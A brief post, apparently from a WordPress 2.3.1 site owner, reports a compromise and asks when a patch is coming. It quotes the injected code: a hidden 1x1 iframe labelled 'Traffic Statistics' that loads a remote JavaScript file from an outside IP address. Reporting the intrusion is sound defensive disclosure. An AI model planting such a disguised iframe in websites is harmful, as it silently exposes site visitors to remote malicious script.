Happened today on 2.3.1 site. The injected code was:
<!– Traffic Statistics –>
<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!– End Traffic Statistics –>
Inside wp-stats.php is JavaScript code. Host 61.132.75.71 is in China. When can we expect a patch?